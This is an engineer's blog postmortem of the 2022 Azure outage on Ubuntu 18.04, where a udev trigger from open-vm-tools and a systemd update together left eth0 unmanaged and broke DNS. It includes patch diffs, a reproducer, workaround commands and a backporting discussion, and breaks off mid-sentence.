<p>During my work as a Sustaining Engineer at Canonical, occasionally I get tasked
with analysing and fixing high profile regressions that turn into world ending
emergencies. I think I have worked on four or five of these cases now, and
behind each and every one there is a story to tell, and lessons to be learned.</p>
<p>Today, we will dive into the intricate and complex series of events that caused
the worldwide Azure AKS Cloud outage, for systems running Ubuntu 18.04 LTS,
which I was tasked with leading the effort to resolve.</p>
<p><img src="/assets/images/2022_002.png" alt="hero" /></p>
<p>So, go brew a cup of coffee or whip up a hot chocolate, and let’s recount the
events that happened four months ago, and how we worked to resolve them without
causing another world ending event to occur.</p>
<!--more-->
<h1 id="the-impact">The Impact</h1>
<p>Late at night on the 30th of August, workloads hosted in Bionic VMs and
containers running on Azure Kubernetes Service (AKS), Azure Monitor,
Azure Sentinel, Azure Container Apps, and a few other services started failing,
after they had consumed a “bad” systemd package 237-3ubuntu10.54, which
unattended-upgrades had dutifully installed since it was freshly published to
the -security pocket to fix CVE-2022-2526.</p>
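<p>For reference, a quick way to check whether a given machine had consumed the
bad update is the installed version and the unattended-upgrades log; the log
path below is the Ubuntu default, and the output is illustrative:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ apt-cache policy systemd | grep Installed
  Installed: 237-3ubuntu10.54
$ grep systemd /var/log/unattended-upgrades/unattended-upgrades.log
</code></pre></div></div>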
<p>This affected all users of the above services globally. As you can imagine,
Azure is a popular platform to host infrastructure on, so the outage directly
affected a considerable number of businesses, small and large, in their
day-to-day activities, which brought about media attention.</p>
<p>It’s not often that bugs make the news, but this one was well written about:</p>
<ul>
<li><a href="https://news.ycombinator.com/item?id=32649273">Azure customers running Canonical Ubuntu 18.04 experiencing DNS errors</a></li>
<li><a href="https://news.ycombinator.com/item?id=32659631">Systemd takes Ubuntu down on Azure?</a></li>
<li><a href="https://www.theregister.com/2022/08/30/ubuntu_systemd_dns_update/">Ubuntu Linux 18.04 systemd security patch breaks DNS in Microsoft Azure</a></li>
<li><a href="https://www.zdnet.com/article/microsoft-azure-outage-continues-for-some-services-relying-on-ubuntu-bionic-release/">Microsoft Azure outage continues for some services relying on Ubuntu ‘Bionic’ release </a></li>
<li><a href="https://www.techradar.com/news/dodgy-microsoft-azure-update-knocks-ubuntu-vms-offline">Dodgy Microsoft Azure update knocks Ubuntu VMs offline</a></li>
<li><a href="https://mybroadband.co.za/news/software/458579-ubuntu-update-causes-server-downtime-on-microsoft-azure.html">Ubuntu update causes server downtime on Microsoft Azure</a></li>
<li><a href="https://linuxsecurity.com/news/security-vulnerabilities/ubuntu-linux-18-04-systemd-security-patch-breaks-dns-in-microsoft-azure">Ubuntu Linux 18.04 systemd Security Patch Breaks DNS in Microsoft Azure</a></li>
<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-azure-outage-knocks-ubuntu-vms-offline-after-buggy-update/">Microsoft Azure outage knocks Ubuntu VMs offline after buggy update</a></li>
<li><a href="https://redmondmag.com/articles/2022/08/30/microsoft-blames-ubuntu-update-dns-problems-for-azure-services-outage.aspx">Microsoft Blames Ubuntu Update DNS Problems for Azure Services Outage</a></li>
<li><a href="https://petri.com/microsoft-azure-outage-ubuntu-vms/">Microsoft is Investigating Azure Outage Affecting Ubuntu VMs</a></li>
<li><a href="https://thestack.technology/azure-kubernetes-outage-ubuntu-dns/">Bad Ubuntu update crashes global Azure Kubernetes services</a></li>
<li><a href="https://www.datacenterdynamics.com/en/news/microsoft-azures-canonical-ubuntu-service-experiencing-dns-errors/">Microsoft Azure’s Canonical Ubuntu service experiencing DNS errors</a></li>
<li><a href="https://www.itnews.com.au/news/outage-for-ubuntu-users-on-azure-584656">Outage for Ubuntu users on Azure</a></li>
<li><a href="https://thenewstack.io/ubuntu-linux-and-azure-dns-problem-gives-azure-fits/">Ubuntu Linux and Azure DNS Problem Gives Azure Fits</a></li>
<li><a href="https://cloud7.news/cloud/ubuntu-update-on-azure-vms-causing-dns-problems/">Ubuntu update on Azure VMs causing DNS problems</a></li>
</ul>
<p>At this point, Microsoft’s Azure Support tweeted about it:</p>
<blockquote class="twitter-tweet" data-conversation="none" data-lang="en"><p lang="en" dir="ltr">We are aware of an ongoing incident with VMs that recently upgraded to system version 237-3ubuntu 10.54 experiencing DNS error. Please keep updated by following the Azure status page here: https://msft.it/6014jcVEG ^CR</p>— Azure Support (@azuresupport) <a href="https://twitter.com/AzureSupport/status/1564577499606286336">August 30, 2022</a></blockquote>
<p><img src="/assets/images/2022_002.png" alt="status" /></p>
<p>In terms of impact, this is about as big as you can get. Numerous businesses
were disrupted, and many experienced outages. People were woken up in the middle
of the night, paged by downtime watchdogs, and had to try to figure out what on
earth went wrong.</p>
<p>I got into work in the morning, and it seemed like any normal day. Well, until
I read the news, saw the event ongoing, and found a new case freshly escalated
to Sustaining Engineering.</p>
<h1 id="its-not-dns-theres-no-way-its-dns-it-was-dns">Its Not DNS; There’s no way its DNS; It was DNS</h1>
<p>At this point, there was much speculation that the changes made in
237-3ubuntu10.54 caused the regression, and that it simply did not get caught
by our internal regression test suites.</p>
<p>Nishit Majithia prepared the upload, which was actually pretty straightforward:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd (237-3ubuntu10.54) bionic-security; urgency=medium
* SECURITY UPDATE: Use-after-free vulnerability in systemd.
- debian/patches/CVE-2022-2526.patch: pin stream while calling callbacks
for it in src/resolve/resolved-dns-stream.c
- CVE-2022-2526
-- Nishit Majithia <nishit.majithia@canonical.com> Mon, 29 Aug 2022 10:28:49 +0530
</code></pre></div></div>
<p>The diff is very basic, but it does directly change systemd-resolved and DNS
processing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff -Nru systemd-237/debian/patches/CVE-2022-2526.patch systemd-237/debian/patches/CVE-2022-2526.patch
--- systemd-237/debian/patches/CVE-2022-2526.patch 1970-01-01 00:00:00.000000000 +0000
+++ systemd-237/debian/patches/CVE-2022-2526.patch 2022-08-25 13:45:15.000000000 +0000
@@ -0,0 +1,33 @@
+From d973d94dec349fb676fdd844f6fe2ada3538f27c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 4 Dec 2018 22:13:39 +0100
+Subject: [PATCH] resolved: pin stream while calling callbacks for it
+
+These callbacks might unref the stream, but we still have to access it,
+let's hence ref it explicitly.
+
+Maybe fixes: #10725
+---
+ src/resolve/resolved-dns-stream.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- systemd-237.orig/src/resolve/resolved-dns-stream.c
++++ systemd-237/src/resolve/resolved-dns-stream.c
+@@ -64,6 +64,8 @@ static int dns_stream_update_io(DnsStrea
+ }
+
+ static int dns_stream_complete(DnsStream *s, int error) {
++ _cleanup_(dns_stream_unrefp) _unused_ DnsStream *ref = dns_stream_ref(s); /* Protect stream while we process it */
++
+ assert(s);
+ assert(error >= 0);
+
+@@ -214,7 +216,7 @@ static int on_stream_timeout(sd_event_so
+ }
+
+ static int on_stream_io(sd_event_source *es, int fd, uint32_t revents, void *userdata) {
+- DnsStream *s = userdata;
++ _cleanup_(dns_stream_unrefp) DnsStream *s = dns_stream_ref(userdata); /* Protect stream while we process it */
+ bool progressed = false;
+ int r;
+
</code></pre></div></div>
<p>However, the changes to the systemd package in 237-3ubuntu10.54 were completely
benign. We simply take a reference on the DNS stream to make sure it is
not freed while there are still references pointing to it.</p>
<p>Benign or not, if a package causes a regression, it gets pulled from the Ubuntu
archive until the root cause is found and an update issued to correct it. systemd
237-3ubuntu10.54 was removed from -security and -updates, and placed into
-proposed.</p>
<p>The interesting thing we all noted is that it did not affect server installs on
bare metal, KVM, or LXC, nor any other public cloud, like GCP or AWS.</p>
<p>A Launchpad bug was filed, and this is where most of our information about the
regression was kept. <a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119">LP1988119 Update to systemd 237-3ubuntu10.54 broke dns</a></p>
<p>At this point, Kyler Horner from the Support Team was working with Azure
Engineers over a Google Meet, and had a breakthrough.</p>
<p>They noticed that the <code class="language-plaintext highlighter-rouge">hv_netvsc</code> driver property is dropped from
<code class="language-plaintext highlighter-rouge">udevadm info /sys/class/net/eth0</code> output after unattended-upgrades runs on a fresh
Ubuntu Cloud Image for Azure. If you install the problematic systemd package
after unattended-upgrades has finished running, everything breaks.</p>
<p>The package in question was soon narrowed down to <code class="language-plaintext highlighter-rouge">open-vm-tools</code>. If you
installed open-vm-tools before systemd, DNS stops working, and the VM loses
networking.</p>
<p>Looking more closely at open-vm-tools 11.0.5-4ubuntu0.18.04.1 in bionic,
we find the following postinstall script:</p>
<p><code class="language-plaintext highlighter-rouge">debian/open-vm-tools.postinst</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
case "${1}" in
configure)
if which udevadm 1>/dev/null; then
udevadm trigger || true
fi
;;
abort-upgrade|abort-remove|abort-deconfigure)
;;
*)
echo "postinst called with unknown argument \`${1}'" >&2
exit 1
;;
esac
#DEBHELPER#
exit 0
</code></pre></div></div>
<p>Okay, so when open-vm-tools is installed, its postinst calls a wholesale <code class="language-plaintext highlighter-rouge">udevadm trigger || true</code>.
Then, when systemd is installed, it restarts the systemd-networkd service, and
the issue is reproduced.</p>
<p>So, we have a minimal reproducer.</p>
<p>Start a VM on Azure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. $ ping google.com
PING google.com (172.253.62.102) 56(84) bytes of data.
64 bytes from bc-in-f102.1e100.net (172.253.62.102): icmp_seq=1 ttl=56
2. sudo udevadm trigger
3. sudo systemctl restart systemd-networkd
4. ping google.com
ping: google.com: Temporary failure in name resolution
</code></pre></div></div>
<p>Now, the udev (userspace /dev) subsystem is responsible for managing device
nodes in /dev. It does so by constantly listening for device and hotplug
events, and when one happens, it applies a series of udev rules to make sure
the correct kernel module is loaded for whatever piece of hardware is attached,
a script is run, and so on.</p>
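<p>If you want to watch udev process these events in real time, <code class="language-plaintext highlighter-rouge">udevadm monitor</code>
can print each uevent along with the properties udev assigns; a small sketch
(any Linux machine will do):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Terminal 1: watch udev events for network devices, after rules have
# been processed, including their properties
$ sudo udevadm monitor --udev --property --subsystem-match=net

# Terminal 2: replay a 'change' uevent against eth0 and observe which
# properties survive
$ sudo udevadm trigger -c change -y eth0
</code></pre></div></div>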
<p>In this case, let’s consider the output of <code class="language-plaintext highlighter-rouge">udevadm info /sys/class/net/eth0</code>,
the ethernet device powered by <code class="language-plaintext highlighter-rouge">hv_netvsc</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-cache policy systemd | grep Installed
Installed: 237-3ubuntu10.53
$ udevadm info /sys/class/net/eth0
P: /devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: ID_NET_DRIVER=hv_netvsc
E: ID_NET_LINK_FILE=/run/systemd/network/10-netplan-eth0.link
E: ID_NET_NAME=eth0
E: ID_NET_NAME_MAC=enx000d3a1b6d42
E: ID_OUI_FROM_DATABASE=Microsoft Corp.
E: ID_PATH=acpi-VMBUS:00
E: ID_PATH_TAG=acpi-VMBUS_00
E: IFINDEX=2
E: INTERFACE=eth0
E: NM_UNMANAGED=1
E: SUBSYSTEM=net
E: SYSTEMD_ALIAS=/sys/subsystem/net/devices/eth0
E: TAGS=:systemd:
E: USEC_INITIALIZED=1977684
</code></pre></div></div>
<p>If we then issue <code class="language-plaintext highlighter-rouge">udevadm trigger</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo udevadm trigger
$ udevadm info /sys/class/net/eth0
P: /devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: DEVPATH=/devices/LNXSYSTM:00/LNXSYBUS:00/ACPI0004:00/VMBUS:00/000d3a1b-6d42-000d-3a1b-6d42000d3a1b/net/eth0
E: ID_NET_NAME_MAC=enx000d3a1b6d42
E: ID_OUI_FROM_DATABASE=Microsoft Corp.
E: ID_PATH=acpi-VMBUS:00
E: ID_PATH_TAG=acpi-VMBUS_00
E: IFINDEX=2
E: INTERFACE=eth0
E: SUBSYSTEM=net
E: SYSTEMD_ALIAS=/sys/subsystem/net/devices/eth0
E: TAGS=:systemd:
E: USEC_INITIALIZED=1977684
</code></pre></div></div>
<p>We lost a few attributes, namely <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, <code class="language-plaintext highlighter-rouge">ID_NET_LINK_FILE</code>, and <code class="language-plaintext highlighter-rouge">ID_NET_NAME</code>.</p>
<p>These attributes turn out to be really, really important.</p>
<p>The <code class="language-plaintext highlighter-rouge">eth0</code> device is managed by Netplan on Azure. Looking at the YAML extracted
from an Azure instance:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>network:
ethernets:
eth0:
dhcp4: true
match:
driver: hv_netvsc
macaddress: 00:0d:3a:1a:b4:7d
set-name: eth0
version: 2
</code></pre></div></div>
<p>We see that we are directly matching on <code class="language-plaintext highlighter-rouge">driver: hv_netvsc</code>. But how does
Netplan match for <code class="language-plaintext highlighter-rouge">hv_netvsc</code>? It checks <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>!</p>
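<p>Under the hood, <code class="language-plaintext highlighter-rouge">netplan generate</code> renders this YAML into a systemd-networkd
unit; a sketch of roughly what the generated file contains (path and exact
contents assumed from Netplan defaults):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># /run/systemd/network/10-netplan-eth0.network (sketch)
[Match]
MACAddress=00:0d:3a:1a:b4:7d
Driver=hv_netvsc

[Network]
DHCP=ipv4
</code></pre></div></div>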
<p>When Netplan cannot match <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, systemd-networkd cannot manage the
interface. So when systemd-networkd is restarted, eth0 becomes unmanaged, and
DNS goes down.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ping google.com
ping: google.com: Temporary failure in name resolution
</code></pre></div></div>
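<p>You can also see the interface fall out of systemd-networkd’s management with
<code class="language-plaintext highlighter-rouge">networkctl</code> (output illustrative; the columns vary a little between systemd versions):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ networkctl list eth0
IDX LINK             TYPE               OPERATIONAL SETUP
  2 eth0             ether              routable    unmanaged
</code></pre></div></div>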
<h2 id="workarounds">Workarounds</h2>
<p>At this point, the community were coming up with all sorts of workarounds to get
DNS restored. I’ll document a few, since they are interesting.</p>
<p>You can manually run dhclient:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ dhclient -x
$ dhclient -i eth0
</code></pre></div></div>
<p>You can reboot the node (which is what I recommended early on).</p>
<p>Another solution was to send an <code class="language-plaintext highlighter-rouge">ADD</code> uevent to the device missing <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo udevadm trigger -c add -y eth0
</code></pre></div></div>
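<p>After which the attribute should be back, which you can confirm with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
</code></pre></div></div>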
<p>and there were the various ways of populating <code class="language-plaintext highlighter-rouge">/etc/resolv.conf</code> from within Kubernetes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ VMSS=XXX-vmss
$ nodeResourceGroup=XXX-worker
$ az vmss list-instances -g $nodeResourceGroup -n $VMSS --query "[].id" --output tsv | az vmss run-command invoke --scripts "systemd-resolve --set-dns=your_dns --set-dns=your_dns --set-domain=reddog.microsoft.com --interface=eth0" --command-id RunShellScript --ids @-
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get no -o json | jq -r '.items[].spec.providerID' | cut -c 9- | az vmss run-command invoke --ids @- \
--command-id RunShellScript \
--scripts 'grep nameserver /etc/resolv.conf || { dhclient -x; dhclient -i eth0; sleep 10; pkill dhclient; grep nameserver /etc/resolv.conf; }'
</code></pre></div></div>
<p>and so on.</p>
<p>Okay, so now we understand the events that led to the widespread outage.
An <code class="language-plaintext highlighter-rouge">open-vm-tools</code> package update was released a few weeks prior, and
unattended-upgrades had installed it like any other package update.
Its postinstall script executed a wholesale <code class="language-plaintext highlighter-rouge">udevadm trigger</code>,
which caused the <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code> attribute to be lost from <code class="language-plaintext highlighter-rouge">eth0</code>, priming the
systems for failure. When the systemd security update came through, it restarted
systemd-networkd, and since Netplan could not match <code class="language-plaintext highlighter-rouge">hv_netvsc</code> against
<code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, <code class="language-plaintext highlighter-rouge">eth0</code> went unmanaged and the VM lost DNS.</p>
<p>What makes this case interesting is that it stems from a complex interaction
between two packages, the type of bug that is extremely hard to find during
normal regression testing.</p>
<h1 id="the-fix">The Fix</h1>
<p>We have a pretty good understanding of the problem, and even have a minimal
reproducer which makes testing easy. Time to dive in and find the actual root
cause, and determine what needs to be fixed.</p>
<h2 id="systemd">systemd</h2>
<p>Chris Coulson, from the Security Team, had found the commit that would likely
fix the issue before I had even read the case:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Author: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=, ID_NET_NAME= properties on non-'add' uevent
Link: https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
</code></pre></div></div>
<p>When I got in in the morning, I read the case, created a few Azure VMs, made
sure I could reproduce the issue, and set about backporting the commit to test
if it does indeed fix the issue.</p>
<p>This means the bug exists in systemd itself, in the udev subsystem. Looking
closer at the patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
ID_NET_NAME= properties on non-'add' uevent
Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
rules.d/80-net-setup-link.rules | 2 +-
src/udev/net/link-config.c | 30 +++++++++++++++++++++++++++---
2 files changed, 28 insertions(+), 4 deletions(-)
diff --git a/rules.d/80-net-setup-link.rules b/rules.d/80-net-setup-link.rules
index 6e411a91f0ec..bafc3fbc846b 100644
--- a/rules.d/80-net-setup-link.rules
+++ b/rules.d/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_end"
IMPORT{builtin}="path_id"
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
IMPORT{builtin}="net_setup_link"
diff --git a/src/udev/net/link-config.c b/src/udev/net/link-config.c
index 77edbb674dc7..5c871b671796 100644
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -11,6 +11,7 @@
#include "conf-files.h"
#include "conf-parser.h"
#include "def.h"
+#include "device-private.h"
#include "device-util.h"
#include "ethtool-util.h"
#include "fd-util.h"
@@ -605,6 +606,7 @@ static int link_config_apply_alternative_names(sd_netlink **rtnl, const link_con
int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device *device, const char **ret_name) {
const char *new_name;
+ DeviceAction a;
int r;
assert(ctx);
@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
assert(device);
assert(ret_name);
+ r = device_get_action(device, &a);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+ if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, ret_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+ return 0;
+ }
+
r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
if (r < 0)
return r;
@@ -620,9 +636,17 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
if (r < 0)
return r;
- r = link_config_generate_new_name(ctx, config, device, &new_name);
- if (r < 0)
- return r;
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, &new_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+ } else {
+ r = link_config_generate_new_name(ctx, config, device, &new_name);
+ if (r < 0)
+ return r;
+ }
r = link_config_apply_alternative_names(&ctx->rtnl, config, device, new_name);
if (r < 0)
</code></pre></div></div>
<p>At face value, the patch simply checks what kind of uevent has been issued.
If it is anything other than <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_ADD</code>, <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_BIND</code>, or <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_MOVE</code>,
such as <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_CHANGE</code> or <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_REMOVE</code>, we return from
<code class="language-plaintext highlighter-rouge">link_config_apply()</code> early.</p>
<p>If we have a <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_MOVE</code> uevent, then we keep the existing <code class="language-plaintext highlighter-rouge">Name=</code>
and <code class="language-plaintext highlighter-rouge">NamePolicy=</code> attributes; otherwise, we generate new ones.</p>
<p>The important part is the <code class="language-plaintext highlighter-rouge">DEVICE_ACTION_MOVE</code> hunk, which is what really solves
the issue.</p>
<p>It was at this point that I discovered we had experienced this exact
same issue two years earlier in Focal and Groovy, in <a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1902960">LP1902960 Upgrade from 245.4-4ubuntu3.2 to 245.4-4ubuntu3.3 appears to break DNS resolution in some cases</a>.</p>
<p>The backport for Focal and Groovy was performed by my colleague at the time,
Dan Streetman. Back then, there was no evidence that Bionic was affected by
this issue, and the problem had not been reproduced there, so given the risk of
regression, it was omitted.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> while this commit is not included in bionic, due to the difficult nature of
> reproducing (and verifying) this, and the fact it has only been seen once on
> a focal image, I don't think it's appropriate to SRU to bionic at this point;
> possibly it may be appropriate if this is ever reproduced with a bionic image.
</code></pre></div></div>
<p>It is easy to get caught up in the moment and think that all of this trouble
could have been avoided if we had just backported the fix to Bionic when the
issue was first discovered, but the world, life, and software engineering
sometimes aren’t as simple as that. Any change at all can introduce
a regression to any package in Ubuntu; even a simple no-change rebuild of a
package could introduce a dire regression (it might be linked against a newer
version of a library that you would never think of, which might contain a bug).
Any and all changes to packages in the Ubuntu archive require a great deal of
thought, and sometimes you err on the side of caution and don’t introduce a change.</p>
<p>At the time, the issue could not be reproduced on Bionic, and it hadn’t been
seen anywhere other than Focal. While SRU policy stipulates that you need to fix
all stable releases that are affected, you could easily have made the argument
that since the problem was not observed on Bionic, and systemd is a critical
core package, the risk of regression would be very high for something not
testable (at that time).</p>
<p>So, in these situations, it’s best to accept the facts of what happened, and
instead of getting frustrated, be happy there is additional information
available on the Launchpad bug, and even more in the debdiff.</p>
<p>Now, looking at Bionic’s systemd implementation, we actually have a bit of
an issue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int link_config_apply(link_config_ctx *ctx, link_config *config,
struct udev_device *device, const char **name) {
bool respect_predictable = false;
struct ether_addr generated_mac;
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
unsigned speed;
int r, ifindex;
assert(ctx);
assert(config);
assert(device);
assert(name);
old_name = udev_device_get_sysname(device);
if (!old_name)
return -EINVAL;
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
if (r < 0) {
if (config->port != _NET_DEV_PORT_INVALID)
log_warning_errno(r, "Could not set port (%s) of %s: %m", port_to_string(config->port), old_name);
speed = DIV_ROUND_UP(config->speed, 1000000);
if (r == -EOPNOTSUPP)
r = ethtool_set_speed(&ctx->ethtool_fd, old_name, speed, config->duplex);
if (r < 0)
log_warning_errno(r, "Could not set speed or duplex of %s to %u Mbps (%s): %m",
old_name, speed, duplex_to_string(config->duplex));
}
r = ethtool_set_wol(&ctx->ethtool_fd, old_name, config->wol);
if (r < 0)
log_warning_errno(r, "Could not set WakeOnLan of %s to %s: %m",
old_name, wol_to_string(config->wol));
r = ethtool_set_features(&ctx->ethtool_fd, old_name, config->features);
if (r < 0)
log_warning_errno(r, "Could not set offload features of %s: %m", old_name);
ifindex = udev_device_get_ifindex(device);
if (ifindex <= 0) {
log_warning("Could not find ifindex");
return -ENODEV;
}
if (ctx->enable_name_policy && config->name_policy) {
NamePolicy *policy;
for (policy = config->name_policy;
!new_name && *policy != _NAMEPOLICY_INVALID; policy++) {
switch (*policy) {
case NAMEPOLICY_KERNEL:
respect_predictable = true;
break;
case NAMEPOLICY_DATABASE:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_FROM_DATABASE");
break;
case NAMEPOLICY_ONBOARD:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_ONBOARD");
break;
case NAMEPOLICY_SLOT:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_SLOT");
break;
case NAMEPOLICY_PATH:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_PATH");
break;
case NAMEPOLICY_MAC:
new_name = udev_device_get_property_value(device, "ID_NET_NAME_MAC");
break;
default:
break;
}
}
}
if (should_rename(device, respect_predictable)) {
/* if not set by policy, fall back manually set name */
if (!new_name)
new_name = config->name;
} else
new_name = NULL;
switch (config->mac_policy) {
case MACPOLICY_PERSISTENT:
if (mac_is_random(device)) {
r = get_mac(device, false, &generated_mac);
if (r == -ENOENT) {
log_warning_errno(r, "Could not generate persistent MAC address for %s: %m", old_name);
break;
} else if (r < 0)
return r;
mac = &generated_mac;
}
break;
case MACPOLICY_RANDOM:
if (!mac_is_random(device)) {
r = get_mac(device, true, &generated_mac);
if (r == -ENOENT) {
log_warning_errno(r, "Could not generate random MAC address for %s: %m", old_name);
break;
} else if (r < 0)
return r;
mac = &generated_mac;
}
break;
case MACPOLICY_NONE:
default:
mac = config->mac;
}
r = rtnl_set_link_properties(&ctx->rtnl, ifindex, config->alias, mac, config->mtu);
if (r < 0)
return log_warning_errno(r, "Could not set Alias, MACAddress or MTU on %s: %m", old_name);
*name = new_name;
return 0;
}
</code></pre></div></div>
<p>Looking at the first hunk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
assert(device);
assert(ret_name);
+ r = device_get_action(device, &a);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+ if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, ret_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+ return 0;
+ }
+
r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
if (r < 0)
return r;
</code></pre></div></div>
<p>If we backport this as-is, we run into numerous problems, namely
<code class="language-plaintext highlighter-rouge">device_get_action()</code> does not exist, <code class="language-plaintext highlighter-rouge">log_device_error_errno()</code> and
<code class="language-plaintext highlighter-rouge">log_device_debug()</code> do not exist, and neither does <code class="language-plaintext highlighter-rouge">sd_device_get_sysname()</code>.</p>
<p>This is because these functions were added sometime after the version of systemd
in Bionic was released.</p>
<p>So, we are up a creek without a paddle. The second hunk is much the same:
systemd changed substantially between the release of Bionic and when this fix
was authored, and there is no direct way to backport the fix in a cherry-pick
like manner.</p>
<p>I tracked down the commits where these got added:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit a11300221482da7ffe7be2d75d508ddd411814f6
From: Lennart Poettering <lennart@poettering.net>
Date: Wed, 10 Feb 2021 22:15:01 +0100
Subject: sd-device: add sd_device_get_action() +
sd_device_get_seqnum() + sd_device_new_from_stat_rdev()
Link: https://github.com/systemd/systemd/commit/a11300221482da7ffe7be2d75d508ddd411814f6
</code></pre></div></div>
<p>This commit alone is 145 lines added and 139 lines deleted. The commit does
not backport cleanly at all, and worse, is too significant a change to even
